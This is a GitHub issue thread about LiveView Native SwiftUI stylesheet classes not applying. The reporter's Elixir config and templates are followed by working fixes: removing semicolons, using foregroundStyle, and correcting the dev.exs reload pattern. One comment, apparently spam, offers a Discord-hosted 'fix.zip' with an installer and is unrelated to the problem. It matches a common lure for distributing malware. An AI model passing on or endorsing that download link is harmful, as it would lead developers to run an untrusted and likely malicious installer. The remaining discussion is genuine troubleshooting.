### ISSUE TITLE
[Bug]: Can't get classes to work

### ISSUE THREAD

**Issue by hypno2000** [liveview-native/liveview-client-swiftui#1433]
### What happened?

Project is generated with `phx.new`, `lvn.setup.config`, `lvn.setup.gen`.

`config/config.exs`:
```elixir
config :live_view_native_stylesheet,
  content: [
    swiftui: [
      "lib/**/swiftui/*",
      "lib/**/*swiftui*"
    ]
  ],
  output: "priv/static/assets"
```

`lib/my_app_web/live/home_live.swiftui.ex`:
```elixir
defmodule MyAppWeb.Styles.App.SwiftUI do
  use LiveViewNative.Stylesheet, :swiftui

  ~SHEET"""
    "red-title" do
      foregroundColor(.red);
      font(.title);
    end
  """
end
```

`lib/my_app_web/router.ex`:
```elixir
  scope "/", MyAppWeb do
    pipe_through :browser

    live "/", HomeLive
  end
```

`lib/my_app_web/components/layouts_swiftui/root.swiftui.neex`:
```elixir
<.csrf_token />
<Style url={~p"/assets/app.swiftui.styles"} />
<NavigationStack>
  <%= @inner_content %>
</NavigationStack>
```

`lib/my_app_web/live/home_live.swiftui.ex`:
```elixir
defmodule MyAppWeb.HomeLive.SwiftUI do
  use MyAppNative, [:render_component, format: :swiftui]

  def render(assigns, _) do
    ~LVN"""
    <Text class="red-title">Red Title Text</Text>
    """
  end
end
```
`http://localhost:4000/assets/app.swiftui.styles`:
```elixir
%{
  "alert(attr(\"title\"), isPresented: attr(\"presented\"), actions: :actions, message: :message)" => [
    {:alert, [],
     [
       {:__attr__, [], "title"},
       [
         isPresented: {:__attr__, [], "presented"},
         actions: :actions,
         message: :message
       ]
     ]}
  ],
  "bold(true)" => [{:bold, [], [true]}],
  "buttonStyle(.borderedProminent)" => [
    {:buttonStyle, [], [{:., [], [nil, :borderedProminent]}]}
  ],
  "controlSize(.large)" => [{:controlSize, [], [{:., [], [nil, :large]}]}],
  "font(.caption)" => [{:font, [], [{:., [], [nil, :caption]}]}],
  "foregroundStyle(.red)" => [{:foregroundStyle, [], [{:., [], [nil, :red]}]}],
  "frame(maxWidth: .infinity)" => [
    {:frame, [], [[maxWidth: {:., [], [nil, :infinity]}]]}
  ],
  "hidden()" => [{:hidden, [], []}],
  "listRowBackground(:empty)" => [{:listRowBackground, [], [:empty]}],
  "listRowInsets(EdgeInsets())" => [
    {:listRowInsets, [], [{:EdgeInsets, [], []}]}
  ],
  "navigationSubtitle(:subtitle)" => [{:navigationSubtitle, [], [:subtitle]}],
  "navigationTitle(:title)" => [{:navigationTitle, [], [:title]}],
  "sheet(isPresented: attr(\"presented\"), content: :content)" => [
    {:sheet, [],
     [[isPresented: {:__attr__, [], "presented"}, content: :content]]}
  ],
  "toolbar(content: :toolbar)" => [{:toolbar, [], [[content: :toolbar]]}]
}
```

![Screenshot 2024-09-03 at 16 09 20](https://github.com/user-attachments/assets/e587ba77-e50c-4b65-9cf7-08c10befe72e)

I can't find `red-title` styles from `http://localhost:4000/assets/app.swiftui.styles`. I'm not sure how to debug this further.

### Library Version

0.3.0

### Xcode Version

15.4

### Swift Version

5.10

### On which device or simulator are you running into the problem?

iPhone

### Target Device Operating System Version

17.5

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by hypno2000** [comment]
looks like the example here https://hexdocs.pm/live_view_native_swiftui/stylesheets.html#liveview-native-stylesheets is not correct, if i removed semicolons and changed `foregroundColor` to `foregroundStyle` it works but only when i restart the application.

**Comment by cmnstmntmn** [comment]
@hypno2000 can you please check for reloading patterns inside `dev.exs` for this line

```elixir
 ~r"lib/hello_web/styles/.*ex$"
```

I also faced this issue, and a fix has been made:
https://github.com/liveview-native/liveview-client-swiftui/issues/1429

**Comment by cmnstmntmn** [comment]
also you should change `foregroundColor(.red)` to `foregroundStyle(.red)` and remove the colomns;

```
    "color-red" do
      foregroundStyle(.red)
    end
```

**Comment by hypno2000** [comment]
thanks @cmnstmntmn, changing the pattern to `~r"lib/lvn_poc_web/styles/*.*ex$"` fixed the having restart problem.

**Comment by bcardarella** [comment]
I'll probably do a v0.3.1 release this week to get the live reload fix out there.

For people updating unforutnately the old pattern won't be removed by the codegen, it'll just be an extra pattern sitting in their config
